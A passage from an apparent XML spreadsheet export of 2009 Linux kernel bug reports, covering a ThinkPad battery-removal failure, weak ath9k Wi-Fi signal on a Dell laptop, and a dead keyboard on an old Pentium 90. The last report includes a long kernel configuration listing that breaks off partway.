    <t>2009-06-25 16:06 UTC</t>
  </si>
  <si>
    <t>Created attachment 21908 [details] syslog messages System fails, when removing a battery in laptop. Hardware: Thinkpad R400 (7443-C1G) battery in ultrabay and main battery. Steps to reproduce: Replace DVD-RW drive for a ultrabay battery, then try to remove battery. 2.6.29 works fine.</t>
  </si>
  <si>
    <t>ath9k: the signal power is about at 80% when under M$ Vista is at 100%</t>
  </si>
  <si>
    <t>2.6.30 vanilla</t>
  </si>
  <si>
    <t>2009-06-14 15:31 UTC</t>
  </si>
  <si>
    <t>andrea ferraris</t>
  </si>
  <si>
    <t>2009-07-01 16:00 UTC</t>
  </si>
  <si>
    <t>First, let me know which logs and info you need and I'll attach them to the next message. I'm not a wlan expert at all. At first I'll attach kernel.log and lspci -v. The machine is a Dell Studio XPS 1340 with a AR928X PCI Express controller. I'm one meter far from the AP (Zyxel 600 P series) and between the notebook and the AP there are only air. With the pre-installed Windows Vista Home the connection to the network (WAP) is almost immediately established after giving the key and the signal power is at 100%. With the Ubuntu 8.04 kernel, 2.6.27-7 and 2.6.27-14, the signal power was about between 60 amd 80%, then after the upgrade to Ubuntu 9.04 and kernel 2.6.28-11 the wireless network doesn't worked any more. Then I compiled a shiny vanilla 2.6.30 and the situation is that I have the signal power at 80% and the access to the network is quite slow (about 20 seconds). I recompiled enabling the debug for ath9k. In the system log I don't see anomalies or errors.</t>
  </si>
  <si>
    <t>Keyboard doesn't work</t>
  </si>
  <si>
    <t>2.6.28, 2.6.30</t>
  </si>
  <si>
    <t>2009-06-14 19:18 UTC</t>
  </si>
  <si>
    <t>2010-02-23 23:08 UTC</t>
  </si>
  <si>
    <t xml:space="preserve">I've got an old Pentium 90 machine that's been running a 2.4.x kernel for a long time, seems to work OK on a 2.6.18 kernel but doesn't seem to like anything newer. 2.6.30 no keyboard - but otherwise OK 2.6.28 no keyboard - but otherwise OK 2.6.26 reboots just after parsing ELF (maybe one more line) 2.6.25 reboots almost immediately 2.6.18 works OK The 2.6.18 and 26 are Debian kernels (etch and lenny), the rest are vanilla from git. So it looks like something got fixed between 26 and 28 that stops the early reboot. Attached is the .config from the 2.6.30 and a dmesg from that boot. /proc/interrupts shows 8 interrupts on interrupt 1 from the i8042 but it doesn't go up if I type. I've tried a couple of different keyboards, so I don't think it's just a dislike for the keyboard. I can see a /sys entry for the i8042 - I just don't get any input. It has an ISA VGA card (Trident 1M) (I needed the PCI slots for another net card!). I compiled it on a 64bit Ubuntu machine. [ originally posted to lkml, message-id 20090613230842.GA18347@gallifrey Note as per comments on that thread; it is vanilla kernel (from git) and I've also tried without parallel port as per a suggestion on there; didn't help. I believe the motherboard is an Intel Plato or maybe Plato II ] Suggestions welcome, Dave lspci CONFIG-BROKEN-ON-SMP=y CONFIG-INIT-ENV-ARG-LIMIT=32 CONFIG-LOCALVERSION="2.6.30gort1" # CONFIG-LOCALVERSION-AUTO is not set CONFIG-HAVE-KERNEL-GZIP=y CONFIG-HAVE-KERNEL-BZIP2=y CONFIG-HAVE-KERNEL-LZMA=y CONFIG-KERNEL-GZIP=y # CONFIG-KERNEL-BZIP2 is not set # CONFIG-KERNEL-LZMA is not set CONFIG-SWAP=y CONFIG-SYSVIPC=y CONFIG-SYSVIPC-SYSCTL=y CONFIG-POSIX-MQUEUE=y CONFIG-POSIX-MQUEUE-SYSCTL=y # CONFIG-BSD-PROCESS-ACCT is not set # CONFIG-TASKSTATS is not set CONFIG-AUDIT=y CONFIG-AUDITSYSCALL=y CONFIG-AUDIT-TREE=y # # RCU Subsystem # CONFIG-CLASSIC-RCU=y # CONFIG-TREE-RCU is not set # CONFIG-PREEMPT-RCU is not set # CONFIG-TREE-RCU-TRACE is not set # CONFIG-PREEMPT-RCU-TRACE is not set # CONFIG-IKCONFIG is not set CONFIG-LOG-BUF-SHIFT=17 CONFIG-HAVE-UNSTABLE-SCHED-CLOCK=y # CONFIG-GROUP-SCHED is not set # CONFIG-CGROUPS is not set # CONFIG-SYSFS-DEPRECATED-V2 is not set CONFIG-RELAY=y CONFIG-NAMESPACES=y CONFIG-UTS-NS=y CONFIG-IPC-NS=y # CONFIG-USER-NS is not set # CONFIG-PID-NS is not set CONFIG-NET-NS=y # CONFIG-BLK-DEV-INITRD is not set CONFIG-CC-OPTIMIZE-FOR-SIZE=y CONFIG-SYSCTL=y CONFIG-ANON-INODES=y # CONFIG-EMBEDDED is not set CONFIG-UID16=y CONFIG-SYSCTL-SYSCALL=y CONFIG-KALLSYMS=y CONFIG-KALLSYMS-ALL=y # CONFIG-KALLSYMS-EXTRA-PASS is not set # CONFIG-STRIP-ASM-SYMS is not set CONFIG-HOTPLUG=y CONFIG-PRINTK=y CONFIG-BUG=y CONFIG-ELF-CORE=y CONFIG-PCSPKR-PLATFORM=y CONFIG-BASE-FULL=y CONFIG-FUTEX=y CONFIG-EPOLL=y CONFIG-SIGNALFD=y CONFIG-TIMERFD=y CONFIG-EVENTFD=y CONFIG-SHMEM=y CONFIG-AIO=y CONFIG-VM-EVENT-COUNTERS=y CONFIG-PCI-QUIRKS=y CONFIG-SLUB-DEBUG=y # CONFIG-COMPAT-BRK is not set # CONFIG-SLAB is not set CONFIG-SLUB=y # CONFIG-SLOB is not set # CONFIG-PROFILING is not set CONFIG-TRACEPOINTS=y CONFIG-MARKERS=y CONFIG-HAVE-OPROFILE=y CONFIG-HAVE-EFFICIENT-UNALIGNED-ACCESS=y CONFIG-HAVE-IOREMAP-PROT=y CONFIG-HAVE-KPROBES=y CONFIG-HAVE-KRETPROBES=y CONFIG-HAVE-ARCH-TRACEHOOK=y CONFIG-HAVE-DMA-API-DEBUG=y CONFIG-SLOW-WORK=y CONFIG-HAVE-GENERIC-DMA-COHERENT=y CONFIG-SLABINFO=y CONFIG-RT-MUTEXES=y CONFIG-BASE-SMALL=0 # CONFIG-MODULES is not set CONFIG-BLOCK=y # CONFIG-LBD is not set # CONFIG-BLK-DEV-BSG is not set # CONFIG-BLK-DEV-INTEGRITY is not set # # IO Schedulers # CONFIG-IOSCHED-NOOP=y # CONFIG-IOSCHED-AS is not set CONFIG-IOSCHED-DEADLINE=y # CONFIG-IOSCHED-CFQ is not set # CONFIG-DEFAULT-AS is not set CONFIG-DEFAULT-DEADLINE=y # CONFIG-DEFAULT-CFQ is not set # CONFIG-DEFAULT-NOOP is not set CONFIG-DEFAULT-IOSCHED="deadline" # CONFIG-FREEZER is not set # # Processor type and features # CONFIG-TICK-ONESHOT=y CONFIG-NO-HZ=y CONFIG-HIGH-RES-TIMERS=y CONFIG-GENERIC-CLOCKEVENTS-BUILD=y # CONFIG-SMP is not set # CONFIG-X86-EXTENDED-PLATFORM is not set CONFIG-SCHED-OMIT-FRAME-POINTER=y # CONFIG-PARAVIRT-GUEST is not set # CONFIG-MEMTEST is not set # CONFIG-M386 is not set # CONFIG-M486 is not set # CONFIG-M586 is not set CONFIG-M586TSC=y # CONFIG-M586MMX is not set # CONFIG-M686 is not set # CONFIG-MPENTIUMII is not set # CONFIG-MPENTIUMIII is not set # CONFIG-MPENTIUMM is not set # CONFIG-MPENTIUM4 is not set # CONFIG-MK6 is not set # CONFIG-MK7 is not set # CONFIG-MK8 is not set # CONFIG-MCRUSOE is not set # CONFIG-MEFFICEON is not set # CONFIG-MWINCHIPC6 is not set # CONFIG-MWINCHIP3D is not set # CONFIG-MGEODEGX1 is not set # CONFIG-MGEODE-LX is not set # CONFIG-MCYRIXIII is not set # CONFIG-MVIAC3-2 is not set # CONFIG-MVIAC7 is not set # CONFIG-MPSC is not set # CONFIG-MCORE2 is not set # CONFIG-GENERIC-CPU is not set CONFIG-X86-GENERIC=y CONFIG-X86-CPU=y CONFIG-X86-L1-CACHE-BYTES=64 CONFIG-X86-INTERNODE-CACHE-BYTES=64 CONFIG-X86-CMPXCHG=y CONFIG-X86-L1-CACHE-SHIFT=5 CONFIG-X86-XADD=y # CONFIG-X86-PPRO-FENCE is not set CONFIG-X86-F00F-BUG=y CONFIG-X86-WP-WORKS-OK=y CONFIG-X86-INVLPG=y CONFIG-X86-BSWAP=y CONFIG-X86-POPAD-OK=y CONFIG-X86-ALIGNMENT-16=y CONFIG-X86-INTEL-USERCOPY=y CONFIG-X86-TSC=y CONFIG-X86-MINIMUM-CPU-FAMILY=4 CONFIG-CPU-SUP-INTEL=y CONFIG-CPU-SUP-CYRIX-32=y CONFIG-CPU-SUP-AMD=y CONFIG-CPU-SUP-CENTAUR=y CONFIG-CPU-SUP-TRANSMETA-32=y CONFIG-CPU-SUP-UMC-32=y CONFIG-HPET-TIMER=y CONFIG-HPET-EMULATE-RTC=y CONFIG-DMI=y # CONFIG-IOMMU-HELPER is not set # CONFIG-IOMMU-API is not set CONFIG-NR-CPUS=1 CONFIG-PREEMPT-NONE=y # CONFIG-PREEMPT-VOLUNTARY is not set # CONFIG-PREEMPT is not set # CONFIG-X86-UP-APIC is not set # CONFIG-X86-MCE is not set CONFIG-VM86=y # CONFIG-TOSHIBA is not set # CONFIG-I8K is not set # CONFIG-X86-REBOOTFIXUPS is not set # CONFIG-MICROCODE is not set # CONFIG-X86-MSR is not set # CONFIG-X86-CPUID is not set # CONFIG-X86-CPU-DEBUG is not set CONFIG-NOHIGHMEM=y # CONFIG-HIGHMEM4G is not set # CONFIG-HIGHMEM64G is not set CONFIG-PAGE-OFFSET=0xC0000000 # CONFIG-X86-PAE is not set # CONFIG-ARCH-PHYS-ADDR-T-64BIT is not set CONFIG-ARCH-FLATMEM-ENABLE=y CONFIG-ARCH-SPARSEMEM-ENABLE=y CONFIG-ARCH-SELECT-MEMORY-MODEL=y CONFIG-SELECT-MEMORY-MODEL=y CONFIG-FLATMEM-MANUAL=y # CONFIG-DISCONTIGMEM-MANUAL is not set # CONFIG-SPARSEMEM-MANUAL is not set CONFIG-FLATMEM=y CONFIG-FLAT-NODE-MEM-MAP=y CONFIG-SPARSEMEM-STATIC=y CONFIG-PAGEFLAGS-EXTENDED=y CONFIG-SPLIT-PTLOCK-CPUS=4 # CONFIG-PHYS-ADDR-T-64BIT is not set CONFIG-ZONE-DMA-FLAG=1 CONFIG-BOUNCE=y CONFIG-VIRT-TO-BUS=y CONFIG-UNEVICTABLE-LRU=y CONFIG-HAVE-MLOCK=y CONFIG-HAVE-MLOCKED-PAGE-BIT=y CONFIG-X86-CHECK-BIOS-CORRUPTION=y CONFIG-X86-BOOTPARAM-MEMORY-CORRUPTION-CHECK=y CONFIG-X86-RESERVE-LOW-64K=y # CONFIG-MATH-EMULATION is not set CONFIG-MTRR=y CONFIG-MTRR-SANITIZER=y CONFIG-MTRR-SANITIZER-ENABLE-DEFAULT=0 CONFIG-MTRR-SANITIZER-SPARE-REG-NR-DEFAULT=1 # CONFIG-X86-PAT is not set CONFIG-SECCOMP=y CONFIG-CC-STACKPROTECTOR-ALL=y CONFIG-CC-STACKPROTECTOR=y # CONFIG-HZ-100 is not set CONFIG-HZ-250=y # CONFIG-HZ-300 is not set # CONFIG-HZ-1000 is not set CONFIG-HZ=250 CONFIG-SCHED-HRTICK=y # CONFIG-KEXEC is not set CONFIG-PHYSICAL-START=0x100000 CONFIG-RELOCATABLE=y CONFIG-PHYSICAL-ALIGN=0x200000 # CONFIG-COMPAT-VDSO is not set # CONFIG-CMDLINE-BOOL is not set # # Power management and ACPI options # # CONFIG-PM is not set # # CPU Frequency scaling # # CONFIG-CPU-FREQ is not set CONFIG-CPU-IDLE=y CONFIG-CPU-IDLE-GOV-LADDER=y CONFIG-CPU-IDLE-GOV-MENU=y # # Bus options (PCI etc.) # CONFIG-PCI=y # CONFIG-PCI-GOBIOS is not set # CONFIG-PCI-GOMMCONFIG is not set # CONFIG-PCI-GODIRECT is not set # CONFIG-PCI-GOOLPC is not set CONFIG-PCI-GOANY=y CONFIG-PCI-BIOS=y CONFIG-PCI-DIRECT=y CONFIG-PCI-DOMAINS=y # CONFIG-PCIEPORTBUS is not set # CONFIG-ARCH-SUPPORTS-MSI is not set CONFIG-PCI-LEGACY=y # CONFIG-PCI-DEBUG is not set # CONFIG-PCI-STUB is not set # CONFIG-PCI-IOV is not set CONFIG-ISA-DMA-API=y CONFIG-ISA=y # CONFIG-EISA is not set # CONFIG-MCA is not set # CONFIG-SCx200 is not set # CONFIG-OLPC is not set # CONFIG-PCCARD is not set # CONFIG-HOTPLUG-PCI is not set # # Executable file formats / Emulations # CONFIG-BINFMT-ELF=y # CONFIG-CORE-DUMP-DEFAULT-ELF-HEADERS is not set CONFIG-HAVE-AOUT=y # CONFIG-BINFMT-AOUT is not set # CONFIG-BINFMT-MISC is not set CONFIG-HAVE-ATOMIC-IOMAP=y CONFIG-NET=y # # Networking options # CONFIG-PACKET=y CONFIG-PACKET-MMAP=y CONFIG-UNIX=y # CONFIG-NET-KEY is not set CONFIG-INET=y CONFIG-IP-MULTICAST=y CONFIG-IP-ADVANCED-ROUTER=y CONFIG-ASK-IP-FIB-HASH=y # CONFIG-IP-FIB-TRIE is not set CONFIG-IP-FIB-HASH=y CONFIG-IP-MULTIPLE-TABLES=y CONFIG-IP-ROUTE-MULTIPATH=y CONFIG-IP-ROUTE-VERBOSE=y # CONFIG-IP-PNP is not set CONFIG-NET-IPIP=y # CONFIG-NET-IPGRE is not set CONFIG-IP-MROUTE=y CONFIG-IP-PIMSM-V1=y CONFIG-IP-PIMSM-V2=y # CONFIG-ARPD is not set CONFIG-SYN-COOKIES=y # CONFIG-INET-AH is not set # CONFIG-INET-ESP is not set # CONFIG-INET-IPCOMP is not set # CONFIG-INET-XFRM-TUNNEL is not set CONFIG-INET-TUNNEL=y # CONFIG-INET-XFRM-MODE-TRANSPORT is not set # CONFIG-INET-XFRM-MODE-TUNNEL is not set # CONFIG-INET-XFRM-MODE-BEET is not set CONFIG-INET-LRO=y CONFIG-INET-DIAG=y CONFIG-INET-TCP-DIAG=y CONFIG-TCP-CONG-ADVANCED=y CONFIG-TCP-CONG-BIC=y CONFIG-TCP-CONG-CUBIC=y CONFIG-TCP-CONG-WESTWOOD=y CONFIG-TCP-CONG-HTCP=y CONFIG-TCP-CONG-HSTCP=y CONFIG-TCP-CONG-HYBLA=y CONFIG-TCP-CONG-VEGAS=y CONFIG-TCP-CONG-SCALABLE=y CONFIG-TCP-CONG-LP=y CONFIG-TCP-CONG-VENO=y CONFIG-TCP-CONG-YEAH=y CONFIG-TCP-CONG-ILLINOIS=y # CONFIG-DEFAULT-BIC is not set CONFIG-DEFAULT-CUBIC=y # CONFIG-DEFAULT-HTCP is not set # CONFIG-DEFAULT-VEGAS is not set # CONFIG-DEFAULT-WESTWOOD is not set # CONFIG-DEFAULT-RENO is not set CONFIG-DEFAULT-TCP-CONG="cubic" CONFIG-TCP-MD5SIG=y # CONFIG-IPV6 is not set CONFIG-NETLABEL=y CONFIG-NETWORK-SECMARK=y CONFIG-NETFILTER=y # CONFIG-NETFILTER-DEBUG is not set CONFIG-NETFILTER-ADVANCED=y CONFIG-BRIDGE-NETFILTER=y # # Core Netfilter Configuration # CONFIG-NETFILTER-NETLINK=y CONFIG-NETFILTER-NETLINK-QUEUE=y CONFIG-NETFILTER-NETLINK-LOG=y CONFIG-NF-CONNTRACK=y CONFIG-NF-CT-ACCT=y CONFIG-NF-CONNTRACK-MARK=y CONFIG-NF-CONNTRACK-SECMARK=y CONFIG-NF-CONNTRACK-EVENTS=y # CONFIG-NF-CT-PROTO-DCCP is not set CONFIG-NF-CT-PROTO-GRE=y CONFIG-NF-CT-PROTO-SCTP=y CONFIG-NF-CT-PROTO-UDPLITE=y CONFIG-NF-CONNTRACK-AMANDA=y CONFIG-NF-CONNTRACK-FTP=y CONFIG-NF-CONNTRACK-H323=y CONFIG-NF-CONNTRACK-IRC=y CONFIG-NF-CONNTRACK-NETBIOS-NS=y CONFIG-NF-CONNTRACK-PPTP=y # CONFIG-NF-CONNTRACK-SANE is not set CONFIG-NF-CONNTRACK-SIP=y CONFIG-NF-CONNTRACK-TFTP=y CONFIG-NF-CT-NETLINK=y CONFIG-NETFILTER-TPROXY=y CONFIG-NETFILTER-XTABLES=y CONFIG-NETFILTER-XT-TARGET-CLASSIFY=y CONFIG-NETFILTER-XT-TARGET-CONNMARK=y CONFIG-NETFILTER-XT-TARGET-CONNSECMARK=y CONFIG-NETFILTER-XT-TARGET-DSCP=y CONFIG-NETFILTER-XT-TARGET-HL=y CONFIG-NETFILTER-XT-TARGET-MARK=y CONFIG-NETFILTER-XT-TARGET-NFLOG=y CONFIG-NETFILTER-XT-TARGET-NFQUEUE=y CONFIG-NETFILTER-XT-TARGET-NOTRACK=y CONFIG-NETFILTER-XT-TARGET-RATEEST=y CONFIG-NETFILTER-XT-TARGET-TPROXY=y CONFIG-NETFILTER-XT-TARGET-TRACE=y CONFIG-NETFILTER-XT-TARGET-SECMARK=y CONFIG-NETFILTER-XT-TARGET-TCPMSS=y # CONFIG-NETFILTER-XT-TARGET-TCPOPTSTRIP is not set CONFIG-NETFILTER-XT-MATCH-CLUSTER=y CONFIG-NETFILTER-XT-MATCH-COMMENT=y CONFIG-NETFILTER-XT-MATCH-CONNBYTES=y CONFIG-NETFILTER-XT-MATCH-CONNLIMIT=y CONFIG-NETFILTER-XT-MATCH-CONNMARK=y CONFIG-NETFILTER-XT-MATCH-CONNTRACK=y CONFIG-NETFILTER-XT-MATCH-DCCP=y CONFIG-NETFILTER-XT-MATCH-DSCP=y CONFIG-NETFILTER-XT-MATCH-ESP=y CONFIG-NETFILTER-XT-MATCH-HASHLIMIT=y CONFIG-NETFILTER-XT-MATCH-HELPER=y CONFIG-NETFILTER-XT-MATCH-HL=y CONFIG-NETFILTER-XT-MATCH-IPRANGE=y CONFIG-NETFILTER-XT-MATCH-LENGTH=y CONFIG-NETFILTER-XT-MATCH-LIMIT=y CONFIG-NETFILTER-XT-MATCH-MAC=y CONFIG-NETFILTER-XT-MATCH-MARK=y CONFIG-NETFILTER-XT-MATCH-MULTIPORT=y CONFIG-NETFILTER-XT-MATCH-OWNER=y CONFIG-NETFILTER-XT-MATCH-PHYSDEV=y CONFIG-NETFILTER-XT-MATCH-PKTTYPE=y CONFIG-NETFILTER-XT-MATCH-QUOTA=y CONFIG-NETFILTER-XT-MATCH-RATEEST=y CONFIG-NETFILTER-XT-MATCH-REALM=y CONFIG-NETFILTER-XT-MATCH-RECENT=y # CONFIG-NETFILTER-XT-MATCH-RECENT-PROC-COMPAT is not set CONFIG-NETFILTER-XT-MATCH-SCTP=y CONFIG-NETFILTER-XT-MATCH-SOCKET=y CONFIG-NETFILTER-XT-MATCH-STATE=y CONFIG-NETFILTER-XT-MATCH-STATISTIC=y CONFIG-NETFILTER-XT-MATCH-STRING=y CONFIG-NETFILTER-XT-MATCH-TCPMSS=y CONFIG-NETFILTER-XT-MATCH-TIME=y CONFIG-NETFILTER-XT-MATCH-U32=y CONFIG-IP-VS=y # CONFIG-IP-VS-DEBUG is not set CONFIG-IP-VS-TAB-BITS=12 # # IPVS transport protocol load balancing support # CONFIG-IP-VS-PROTO-TCP=y CONFIG-IP-VS-PROTO-UDP=y CONFIG-IP-VS-PROTO-AH-ESP=y CONFIG-IP-VS-PROTO-ESP=y CONFIG-IP-VS-PROTO-AH=y # # IPVS scheduler # CONFIG-IP-VS-RR=y CONFIG-IP-VS-WRR=y CONFIG-IP-VS-LC=y CONFIG-IP-VS-WLC=y CONFIG-IP-VS-LBLC=y CONFIG-IP-VS-LBLCR=y CONFIG-IP-VS-DH=y CONFIG-IP-VS-SH=y CONFIG-IP-VS-SED=y CONFIG-IP-VS-NQ=y # # IPVS application helper # CONFIG-IP-VS-FTP=y # # IP: Netfilter Configuration # CONFIG-NF-DEFRAG-IPV4=y CONFIG-NF-CONNTRACK-IPV4=y CONFIG-NF-CONNTRACK-PROC-COMPAT=y CONFIG-IP-NF-QUEUE=y CONFIG-IP-NF-IPTABLES=y CONFIG-IP-NF-MATCH-ADDRTYPE=y CONFIG-IP-NF-MATCH-AH=y CONFIG-IP-NF-MATCH-ECN=y CONFIG-IP-NF-MATCH-TTL=y CONFIG-IP-NF-FILTER=y CONFIG-IP-NF-TARGET-REJECT=y CONFIG-IP-NF-TARGET-LOG=y CONFIG-IP-NF-TARGET-ULOG=y CONFIG-NF-NAT=y CONFIG-NF-NAT-NEEDED=y CONFIG-IP-NF-TARGET-MASQUERADE=y CONFIG-IP-NF-TARGET-NETMAP=y CONFIG-IP-NF-TARGET-REDIRECT=y CONFIG-NF-NAT-SNMP-BASIC=y CONFIG-NF-NAT-PROTO-GRE=y CONFIG-NF-NAT-PROTO-UDPLITE=y CONFIG-NF-NAT-PROTO-SCTP=y CONFIG-NF-NAT-FTP=y CONFIG-NF-NAT-IRC=y CONFIG-NF-NAT-TFTP=y CONFIG-NF-NAT-AMANDA=y CONFIG-NF-NAT-PPTP=y CONFIG-NF-NAT-H323=y CONFIG-NF-NAT-SIP=y CONFIG-IP-NF-MANGLE=y CONFIG-IP-NF-TARGET-CLUSTERIP=y CONFIG-IP-NF-TARGET-ECN=y CONFIG-IP-NF-TARGET-TTL=y CONFIG-IP-NF-RAW=y CONFIG-IP-NF-SECURITY=y CONFIG-IP-NF-ARPTABLES=y CONFIG-IP-NF-ARPFILTER=y CONFIG-IP-NF-ARP-MANGLE=y CONFIG-BRIDGE-NF-EBTABLES=y CONFIG-BRIDGE-EBT-BROUTE=y CONFIG-BRIDGE-EBT-T-FILTER=y CONFIG-BRIDGE-EBT-T-NAT=y CONFIG-BRIDGE-EBT-802-3=y CONFIG-BRIDGE-EBT-AMONG=y CONFIG-BRIDGE-EBT-ARP=y CONFIG-BRIDGE-EBT-IP=y CONFIG-BRIDGE-EBT-LIMIT=y CONFIG-BRIDGE-EBT-MARK=y CONFIG-BRIDGE-EBT-PKTTYPE=y CONFIG-BRIDGE-EBT-STP=y CONFIG-BRIDGE-EBT-VLAN=y CONFIG-BRIDGE-EBT-ARPREPLY=y CONFIG-BRIDGE-EBT-DNAT=y CONFIG-BRIDGE-EBT-MARK-T=y CONFIG-BRIDGE-EBT-REDIRECT=y CONFIG-BRIDGE-EBT-SNAT=y CONFIG-BRIDGE-EBT-LOG=y CONFIG-BRIDGE-EBT-ULOG=y CONFIG-BRIDGE-EBT-NFLOG=y # CONFIG-IP-DCCP is not set CONFIG-IP-SCTP=y # CONFIG-SCTP-DBG-MSG is not set # CONFIG-SCTP-DBG-OBJCNT is not set # CONFIG-SCTP-HMAC-NONE is not set # CONFIG-SCTP-HMAC-SHA1 is not set CONFIG-SCTP-HMAC-MD5=y # CONFIG-TIPC is not set # CONFIG-ATM is not set CONFIG-STP=y CONFIG-BRIDGE=y # CONFIG-NET-DSA is not set # CONFIG-VLAN-8021Q is not set # CONFIG-DECNET is not set CONFIG-LLC=y CONFIG-LLC2=y # CONFIG-IPX is not set # CONFIG-ATALK is not set # CONFIG-X25 is not set # CONFIG-LAPB is not set # CONFIG-ECONET is not set # CONFIG-WAN-ROUTER is not set # CONFIG-PHONET is not set CONFIG-NET-SCHED=y # # Queueing/Scheduling # CONFIG-NET-SCH-CBQ=y CONFIG-NET-SCH-HTB=y CONFIG-NET-SCH-HFSC=y CONFIG-NET-SCH-PRIO=y CONFIG-NET-SCH-MULTIQ=y CONFIG-NET-SCH-RED=y CONFIG-NET-SCH-SFQ=y CONFIG-NET-SCH-TEQL=y CONFIG-NET-SCH-TBF=y CONFIG-NET-SCH-GRED=y CONFIG-NET-SCH-DSMARK=y CONFIG-NET-SCH-NETEM=y CONFIG-NET-SCH-DRR=y CONFIG-NET-SCH-INGRESS=y # # Classification # CONFIG-NET-CLS=y CONFIG-NET-CLS-BASIC=y CONFIG-NET-CLS-TCINDEX=y CONFIG-NET-CLS-ROUTE4=y CONFIG-NET-CLS-ROUTE=y CONFIG-NET-CLS-FW=y CONFIG-NET-CLS-U32=y # CONFIG-CLS-U32-PERF is not set CONFIG-CLS-U32-MARK=y CONFIG-NET-CLS-RSVP=y CONFIG-NET-CLS-RSVP6=y # CONFIG-NET-CLS-FLOW is not set CONFIG-NET-EMATCH=y CONFIG-NET-EMATCH-STACK=32 CONFIG-NET-EMATCH-CMP=y CONFIG-NET-EMATCH-NBYTE=y CONFIG-NET-EMATCH-U32=y CONFIG-NET-EMATCH-META=y CONFIG-NET-EMATCH-TEXT=y CONFIG-NET-CLS-ACT=y CONFIG-NET-ACT-POLICE=y CONFIG-NET-ACT-GACT=y CONFIG-GACT-PROB=y CONFIG-NET-ACT-MIRRED=y CONFIG-NET-ACT-IPT=y CONFIG-NET-ACT-NAT=y CONFIG-NET-ACT-PEDIT=y CONFIG-NET-ACT-SIMP=y CONFIG-NET-ACT-SKBEDIT=y # CONFIG-NET-CLS-IND is not set CONFIG-NET-SCH-FIFO=y # CONFIG-DCB is not set # # Network testing # # CONFIG-NET-PKTGEN is not set # CONFIG-NET-DROP-MONITOR is not set # CONFIG-HAMRADIO is not set # CONFIG-CAN is not set # CONFIG-IRDA is not set # CONFIG-BT is not set CONFIG-AF-RXRPC=y # CONFIG-AF-RXRPC-DEBUG is not set # CONFIG-RXKAD is not set CONFIG-FIB-RULES=y # CONFIG-WIRELESS is not set # CONFIG-WIMAX is not set # CONFIG-RFKILL is not set # CONFIG-NET-9P is not set # # Device Drivers # # # Generic Driver Options # CONFIG-UEVENT-HELPER-PATH="/sbin/hotplug" # CONFIG-STANDALONE is not set CONFIG-PREVENT-FIRMWARE-BUILD=y CONFIG-FW-LOADER=y CONFIG-FIRMWARE-IN-KERNEL=y CONFIG-EXTRA-FIRMWARE="" # CONFIG-DEBUG-DRIVER is not set # CONFIG-DEBUG-DEVRES is not set # CONFIG-SYS-HYPERVISOR is not set CONFIG-CONNECTOR=y CONFIG-PROC-EVENTS=y # CONFIG-MTD is not set CONFIG-PARPORT=y CONFIG-PARPORT-PC=y CONFIG-PARPORT-SERIAL=y CONFIG-PARPORT-PC-FIFO=y # CONFIG-PARPORT-PC-SUPERIO is not set # CONFIG-PARPORT-GSC is not set CONFIG-PARPORT-AX88796=y CONFIG-PARPORT-1284=y CONFIG-PARPORT-NOT-PC=y CONFIG-PNP=y CONFIG-PNP-DEBUG-MESSAGES=y # # Protocols # CONFIG-ISAPNP=y # CONFIG-PNPBIOS is not set # CONFIG-PNPACPI is not set CONFIG-BLK-DEV=y CONFIG-BLK-DEV-FD=y # CONFIG-BLK-DEV-XD is not set # CONFIG-PARIDE is not set # CONFIG-BLK-CPQ-DA is not set # CONFIG-BLK-CPQ-CISS-DA is not set # CONFIG-BLK-DEV-DAC960 is not set # CONFIG-BLK-DEV-UMEM is not set # CONFIG-BLK-DEV-COW-COMMON is not set CONFIG-BLK-DEV-LOOP=y CONFIG-BLK-DEV-CRYPTOLOOP=y # CONFIG-BLK-DEV-NBD is not set # CONFIG-BLK-DEV-SX8 is not set # CONFIG-BLK-DEV-RAM is not set # CONFIG-CDROM-PKTCDVD is not set # CONFIG-ATA-OVER-ETH is not set # CONFIG-BLK-DEV-HD is not set CONFIG-MISC-DEVICES=y # CONFIG-IBM-ASM is not set # CONFIG-PHANTOM is not set # CONFIG-SGI-IOC4 is not set CONFIG-TIFM-CORE=y # CONFIG-TIFM-7XX1 is not set # CONFIG-ICS932S401 is not set # CONFIG-ENCLOSURE-SERVICES is not set # CONFIG-HP-ILO is not set # CONFIG-ISL29003 is not set # CONFIG-C2PORT is not set # # EEPROM support # # CONFIG-EEPROM-AT24 is not set # CONFIG-EEPROM-LEGACY is not set # CONFIG-EEPROM-93CX6 is not set CONFIG-HAVE-IDE=y CONFIG-IDE=y # # Please see Documentation/ide/ide.txt for help/info on IDE drives # CONFIG-IDE-ATAPI=y # CONFIG-BLK-DEV-IDE-SATA is not set CONFIG-IDE-GD=y CONFIG-IDE-GD-ATA=y # CONFIG-IDE-GD-ATAPI is not set CONFIG-BLK-DEV-IDECD=y CONFIG-BLK-DEV-IDECD-VERBOSE-ERRORS=y # CONFIG-BLK-DEV-IDETAPE is not set # CONFIG-IDE-TASK-IOCTL is not set CONFIG-IDE-PROC-FS=y # # IDE chipset support/bugfixes # # CONFIG-IDE-GENERIC is not set # CONFIG-BLK-DEV-PLATFORM is not set # CONFIG-BLK-DEV-CMD640 is not set # CONFIG-BLK-DEV-IDEPNP is not set # # PCI IDE chipsets support # CONFIG-BLK-DEV-IDEPCI=y CONFIG-IDEPCI-PCIBUS-ORDER=y # CONFIG-BLK-DEV-GENERIC is not set # CONFIG-BLK-DEV-OPTI621 is not set CONFIG-BLK-DEV-RZ1000=y # CONFIG-BLK-DEV-AEC62XX is not set # CONFIG-BLK-DEV-ALI15X3 is not set # CONFIG-BLK-DEV-AMD74XX is not set # CONFIG-BLK-DEV-ATIIXP is not set # CONFIG-BLK-DEV-CMD64X is not set # CONFIG-BLK-DEV-TRIFLEX is not set # CONFIG-BLK-DEV-CS5520 is not set # CONFIG-BLK-DEV-CS5530 is not set # CONFIG-BLK-DEV-CS5535 is not set # CONFIG-BLK-DEV-CS5536 is not set # CONFIG-BLK-DEV-HPT366 is not set # CONFIG-BLK-DEV-JMICRON is not set # CONFIG-BLK-DEV-SC1200 is not set # CONFIG-BLK-DEV-PIIX is not set # CONFIG-BLK-DEV-IT8172 is not set # CONFIG-BLK-DEV-IT8213 is not set # CONFIG-BLK-DEV-IT821X is not set # CONFIG-BLK-DEV-NS87415 is not set # CONFIG-BLK-DEV-PDC202XX-OLD is not set # CONFIG-BLK-DEV-PDC202XX-NEW is not set # CONFIG-BLK-DEV-SVWKS is not set # CONFIG-BLK-DEV-SIIMAGE is not set # CONFIG-BLK-DEV-SIS5513 is not set # CONFIG-BLK-DEV-SLC90E66 is not set # CONFIG-BLK-DEV-TRM290 is not set # CONFIG-BLK-DEV-VIA82CXXX is not set # CONFIG-BLK-DEV-TC86C001 is not set # # Other IDE chipsets support # # 